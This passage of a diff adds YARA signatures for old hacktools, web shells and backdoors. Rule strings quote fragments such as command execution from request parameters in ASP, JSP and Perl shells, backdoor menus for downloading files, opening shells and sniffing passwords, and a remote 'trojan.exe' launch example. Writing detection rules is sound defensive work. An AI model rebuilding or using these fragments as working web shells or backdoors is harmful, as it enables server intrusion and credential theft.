+		$s14 = "error.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule DK_Brute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+	strings:
+		$s6 = "get_CrackedCredentials" fullword ascii
+		$s13 = "Same port used for two different protocols:" fullword wide
+		$s18 = "coded by fLaSh" fullword ascii
+		$s19 = "get_grbToolsScaningCracking" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_config {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+	strings:
+		$s2 = "Restore=1" fullword ascii
+		$s6 = "Thread=" ascii
+		$s7 = "Running=1" fullword ascii
+		$s8 = "CheckCombination=" fullword ascii
+		$s10 = "AutoSave=1.000000" fullword ascii
+		$s12 = "TryConnect=" ascii
+		$s13 = "Tray=" ascii
+	condition:
+		all of them
+}
+
+rule sig_238_hunt {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+	strings:
+		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+		$s3 = "Usage - hunt \\\\servername" fullword ascii
+		$s4 = ".share = %S - %S" fullword wide
+		$s5 = "SMB share enumerator and admin finder " fullword ascii
+		$s7 = "Hunt only runs on Windows NT..." fullword ascii
+		$s8 = "User = %S" fullword ascii
+		$s9 = "Admin is %s\\%s" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_listip {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file listip.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+	strings:
+		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+		$s4 = "Local Host Name: %s" fullword ascii
+		$s5 = "Packed by exe32pack 1.38" fullword ascii
+		$s7 = "Local Computer Name: %s" fullword ascii
+		$s8 = "Local IP Adress: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTrayHookDll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+	strings:
+		$s0 = "ArtTrayHookDll.dll" fullword ascii
+		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_eee {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file eee.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+	strings:
+		$s0 = "szj1230@yesky.com" fullword wide
+		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+		$s4 = "MailTo:szj1230@yesky.com" fullword wide
+		$s5 = "Command1_Click" fullword ascii
+		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+		$s11 = "vb5chs.dll" fullword ascii
+		$s12 = "MSVBVM50.DLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_asp4 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+	strings:
+		$s0 = "system.dll" fullword ascii
+		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
+		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
+		$s5 = "atype=request(\"atype\") " fullword ascii
+		$s7 = "AceiveX dll" fullword ascii
+		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+		$s10 = "sys.reboot(atype)" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+	strings:
+		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+	condition:
+		3 of them
+}
+
+rule EditServer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+	strings:
+		$s0 = "%s Server.exe" fullword ascii
+		$s1 = "Service Port: %s" fullword ascii
+		$s2 = "The Port Must Been >0 & <65535" fullword ascii
+		$s8 = "3--Set Server Port" fullword ascii
+		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+		$s13 = "Service Name: %s" fullword ascii
+		$s14 = "Server Password: %s" fullword ascii
+		$s17 = "Inject Process Name: %s" fullword ascii
+		
+		$x1 = "WinEggDrop Shell Congirator" fullword ascii
+	condition:
+		5 of ($s*) or $x1 
+}
+
+rule sig_238_letmein {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+	strings:
+		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+		$s6 = "Error get users from server!" fullword ascii
+		$s7 = "get in nt by name and null" fullword ascii
+		$s16 = "get something from nt, hold by killusa." fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_token {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file token.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+	strings:
+		$s0 = "Logon.exe" fullword ascii
+		$s1 = "Domain And User:" fullword ascii
+		$s2 = "PID=Get Addr$(): One" fullword ascii
+		$s3 = "Process " fullword ascii
+		$s4 = "psapi.dllK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_TELNET {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+	strings:
+		$s0 = "TELNET [host [port]]" fullword wide
+		$s2 = "TELNET.EXE" fullword wide
+		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+		$s14 = "Software\\Microsoft\\Telnet" fullword wide
+	condition:
+		all of them
+}
+
+rule snifferport {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d14133b5eaced9b7039048d0767c544419473144"
+	strings:
+		$s0 = "iphlpapi.DLL" fullword ascii
+		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii
+		$s11 = "Port.TX" fullword ascii
+		$s12 = "32Next" fullword ascii
+		$s13 = "V1.2 B" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_webget {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file webget.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "GET A HTTP/1.0" fullword ascii
+		$s2 = " error " fullword ascii
+		$s13 = "Downloa" ascii
+	condition:
+		all of them
+}
+
+rule XYZCmd_zip_Folder_XYZCmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+	strings:
+		$s0 = "Executes Command Remotely" fullword wide
+		$s2 = "XYZCmd.exe" fullword wide
+		$s6 = "No Client Software" fullword wide
+		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
+	condition:
+		all of them
+}
+
+rule ASPack_Chinese {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+	strings:
+		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
+		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
+		$s19 = "= Compress with ASPack" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIR {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+	strings:
+		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s3 = "if Request.Cookies(\"password\")=\"" ascii
+		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s19 = "whichdir=Request(\"path\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_filespy {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file filespy.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 50
+		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
+	strings:
+		$s0 = "Hit [Enter] to begin command mode..." fullword ascii
+		$s1 = "If you are in command mode," fullword ascii
+		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
+		$s9 = "FileSpy.exe" fullword wide
+		$s12 = "ERROR starting FileSpy..." fullword ascii
+		$s16 = "exe\\filespy.dbg" fullword ascii
+		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
+		$s19 = "Should be logging to screen..." fullword ascii
+		$s20 = "Filmon:  Unknown log record type" fullword ascii
+	condition:
+		7 of them
+}
+
+rule ByPassFireWall_zip_Folder_Ie {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+	strings:
+		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule EditKeyLogReadMe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+	strings:
+		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+		$s1 = "WinEggDrop.DLL" fullword ascii
+		$s2 = "nc.exe" fullword ascii
+		$s3 = "KeyLog.exe" fullword ascii
+		$s4 = "EditKeyLog.exe" fullword ascii
+		$s5 = "wineggdrop" fullword ascii
+	condition:
+		3 of them
+}
+
+rule PassSniffer_zip_Folder_readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+	strings:
+		$s0 = "PassSniffer.exe" fullword ascii
+		$s1 = "POP3/FTP Sniffer" fullword ascii
+		$s2 = "Password Sniffer V1.0" fullword ascii
+	condition:
+		1 of them
+}
+
+rule sig_238_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.reg"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+	strings:
+		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+		$s1 = "REGEDIT4" fullword ascii
+		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+	condition:
+		all of them
+}
+
+rule splitjoin {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+	strings:
+		$s0 = "Not for distribution without the authors permission" fullword wide
+		$s2 = "Utility to split and rejoin files.0" fullword wide
+		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+		$s19 = "SplitJoin" fullword wide
+	condition:
+		all of them
+}
+
+rule EditKeyLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+	strings:
+		$s1 = "Press Any Ke" fullword ascii
+		$s2 = "Enter 1 O" fullword ascii
+		$s3 = "Bon >0 & <65535L" fullword ascii
+		$s4 = "--Choose " fullword ascii
+	condition:
+		all of them
+}
+
+rule PassSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+	strings:
+		$s2 = "Sniff" fullword ascii
+		$s3 = "GetLas" fullword ascii
+		$s4 = "VersionExA" fullword ascii
+		$s10 = " Only RuntUZ" fullword ascii
+		$s12 = "emcpysetprintf\\" fullword ascii
+		$s13 = "WSFtartup" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+	strings:
+		$s0 = "response.write \"command completed success!\" " fullword ascii
+		$s1 = "for each co in foditems " fullword ascii
+		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+		$s19 = "<title>Hello! Welcome </title>" fullword ascii
+	condition:
+		all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_SOCKS {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file SOCKS.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ad2168e9837592eeb120fc6798648b2fe996f79c"
+	strings:
+		$s0 = "http://go.163.com/~sdemo" fullword ascii
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s4 = "Player.EXE" fullword wide
+		$s5 = "mailto:sdemo@263.net" fullword ascii
+		$s6 = "S-Player.exe" fullword ascii
+	condition:
+		all of them
+}
+
+rule UnPack_rar_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+	strings:
+		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
+		$s1 = "Explorer.exe" fullword ascii
+		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
+		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
+		$s4 = "The Port Is Out Of Range" fullword ascii
+		$s7 = "Fail To Set The Port" fullword ascii
+		$s11 = "\\psapi.dll" fullword ascii
+		$s20 = "TInject.Dll" fullword ascii
+		
+		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+		$x2 = "injectt.exe" fullword ascii		
+	condition:
+		( 1 of ($x*) ) and ( 3 of ($s*) )
+}
+
+rule Jc_WinEggDrop_Shell {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+	strings:
+		$s0 = "Sniffer.dll" fullword ascii
+		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
+		$s5 = "Fport.exe or mport.exe " fullword ascii
+		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+		$s15 = ": Del www.exe                   " fullword ascii
+		$s20 = ":Dir *.exe                    " fullword ascii
+	condition:
+		2 of them
+}
+
+rule aspbackdoor_asp1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+	strings:
+		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
+		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+		$s15 = "sql=\"select * from scjh\" " fullword ascii
+	condition:
+		all of them
+}
+
+rule QQ_zip_Folder_QQ {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+	strings:
+		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s4 = "QQ2000b.exe" fullword wide
+		$s5 = "haoq@neusoft.com" fullword ascii
+		$s9 = "QQ2000b.exe" fullword ascii
+		$s10 = "\\qq2000b.exe" fullword ascii
+		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
+	condition:
+		5 of them
+}
+
+rule UnPack_rar_Folder_TBack {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
+		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
+		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
+		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
+		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
+		$s8 = "Shell                                 -->Get A Shell" fullword ascii
+		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
+		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
+		$s13 = "Online                                -->List All Connected IP" fullword ascii
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
+		$s19 = "Reboot                                -->Reboot The System" fullword ascii
+		$s20 = "Password Sniffering Is Not Running" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_cmd_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+	strings:
+		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
+		$s1 = "InputStream in = child.getInputStream();" fullword ascii
+		$s2 = "String cmd = request.getParameter(\"" ascii
+		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
+		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+	condition:
+		all of them
+}
+
+rule RangeScan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+	strings:
+		$s0 = "RangeScan.EXE" fullword wide
+		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+		$s9 = "Produced by isn0" fullword ascii
+		$s10 = "RangeScan" fullword wide
+		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+	condition:
+		3 of them
+}
+
+rule XYZCmd_zip_Folder_Readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+	strings:
+		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+		$s20 = "XYZCmd V1.0" fullword ascii
+	condition:
+		all of them
+}
+
+rule ByPassFireWall_zip_Folder_Inject {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+	strings:
+		$s6 = "Fail To Inject" fullword ascii
+		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+		$s11 = " Successfully" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_sqlcmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 40
+		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+	strings:
+		$s0 = "Permission denial to EXEC command.:(" fullword ascii
+		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
+		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+	condition:
+		4 of them
+}
+
+rule ASPack_ASPACK {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+	strings:
+		$s0 = "ASPACK.EXE" fullword wide
+		$s5 = "CLOSEDFOLDER" fullword wide
+		$s10 = "ASPack compressor" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_2323 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+	strings:
+		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+		$s3 = "Failed to execute shell" fullword ascii
+		$s5 = "/h   - Hide Window" fullword ascii
+		$s7 = "Accepted connection from client at %s" fullword ascii
+		$s9 = "Error %d: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Install.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "95866e917f699ee74d4735300568640ea1a05afd"
+	strings:
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s2 = "Player.tmp" fullword ascii
+		$s3 = "Player.EXE" fullword wide
+		$s4 = "mailto:sdemo@263.net" fullword ascii
+		$s5 = "S-Player.exe" fullword ascii
+		$s9 = "http://www.BaiXue.net (" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_TFTPD32 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+	strings:
+		$s0 = " http://arm.533.net" fullword ascii
+		$s1 = "Tftpd32.hlp" fullword ascii
+		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+		$s3 = "TFTPD32 -- " fullword wide
+		$s4 = "%d -- %s" fullword ascii
+		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+		$s12 = "TftpPort" fullword ascii
+		$s13 = "Ttftpd32BackGround" fullword ascii
+		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_iecv {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+	strings:
+		$s1 = "Edit The Content Of Cookie " fullword wide
+		$s3 = "Accessories\\wordpad.exe" fullword ascii
+		$s4 = "gorillanation.com" fullword ascii
+		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+		$s12 = "http://nirsoft.cjb.net" fullword ascii
+	condition:
+		all of them
+}
+
+rule Antiy_Ports_1_21 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+	strings:
+		$s0 = "AntiyPorts.EXE" fullword wide
+		$s7 = "AntiyPorts MFC Application" fullword wide
+		$s20 = " @Stego:" fullword ascii
+	condition:
+		all of them
+}
+
+rule perlcmd_zip_Folder_cmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+	strings:
+		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+		$s1 = "s/%20/ /ig;" fullword ascii
+		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+		$s6 = "$execthis = $_;" fullword ascii
+		$s7 = "system($execthis);" fullword ascii
+		$s12 = "s/%2f/\\//ig;" fullword ascii
+	condition:
+		6 of them
+}
+
+rule aspbackdoor_asp3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+	strings:
+		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+		$s14 = " Windows NT " fullword ascii
+		$s16 = " WIndows 2000 " fullword ascii
+		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_FPipe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s3 = " -s    - outbound source port number" fullword ascii
+		$s5 = "http://www.foundstone.com" fullword ascii
+		$s20 = "Attempting to connect to %s port %d" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_concon {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+	strings:
+		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_regdll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+	strings:
